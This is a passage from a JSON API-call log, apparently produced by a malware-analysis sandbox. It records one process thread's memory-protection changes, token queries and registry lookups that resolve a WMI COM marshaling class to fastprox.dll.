                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 811
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed9501000"
              },
              {
                "name": "ModuleName",
                "value": "wbemsvc.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 812
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 813
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000033c"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 814
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c2"
              },
              {
                "name": "SubKey",
                "value": "Interface\\{027947E1-D731-11CE-A357-000000000001}"
              },
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}"
              }
            ],
            "repeated": 0,
            "id": 815
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "ProxyStubClsid32"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32"
              }
            ],
            "repeated": 0,
            "id": 816
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Interface\\{027947E1-D731-11CE-A357-000000000001}\\ProxyStubClsid32\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 817
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 818
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              }
            ],
            "repeated": 0,
            "id": 819
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c6"
              },
              {
                "name": "SubKey",
                "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              }
            ],
            "repeated": 0,
            "id": 820
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 821
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 822
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\x90o\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90p\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 823
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 824
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 825
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "TreatAs"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              }
            ],
            "repeated": 0,
            "id": 826
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 827
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": "ActivateOnHostFlags"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\ActivateOnHostFlags"
              }
            ],
            "repeated": 0,
            "id": 828
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 829
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 830
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000376"
              },
              {
                "name": "SubKey",
                "value": "InprocServer32"
              },
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 831
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": "InprocServer32"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\InprocServer32"
              }
            ],
            "repeated": 0,
            "id": 832
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 833
          },
          {
            "timestamp": "2025-11-20 10:58:29,781",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "%systemroot%\\system32\\wbem\\fastprox.dll"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\(Default)"
              }
            ],
            "repeated": 1,
            "id": 834
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              },
              {
                "name": "ValueName",
                "value": "ThreadingModel"
              },
              {
                "name": "Data",
                "value": "Both"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocServer32\\ThreadingModel"
              }
            ],
            "repeated": 0,
            "id": 835
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000037a"
              }
            ],
            "repeated": 0,
            "id": 836
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 837
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 838
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": " n\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00 o\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 839
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32"
              }
            ],
            "repeated": 0,
            "id": 840
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 841
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "InprocHandler32"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler32"
              }
            ],
            "repeated": 0,
            "id": 842
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 843
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 844
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": " n\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00 o\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 845
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler"
              }
            ],
            "repeated": 0,
            "id": 846
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 847
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000376"
              },
              {
                "name": "ObjectAttributesName",
                "value": "InprocHandler"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\InprocHandler"
              }
            ],
            "repeated": 0,
            "id": 848
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000376"
              }
            ],
            "repeated": 0,
            "id": 849
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 850
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtWaitForSingleObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x000002d8"
              },
              {
                "name": "Milliseconds",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 851
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x000002c6"
              },
              {
                "name": "SubKey",
                "value": "CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "Handle",
                "value": "0x00000376"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              }
            ],
            "repeated": 0,
            "id": 852
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 853
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000376"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 854
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "Pl\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00v\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00Pm\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 855
          },
          {
            "timestamp": "2025-11-20 10:58:29,797",
            "thread_id": "2188",
            "caller": "0x140084ad0",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TreatAs"
              },
              {
                "name": "ObjectAttributes",
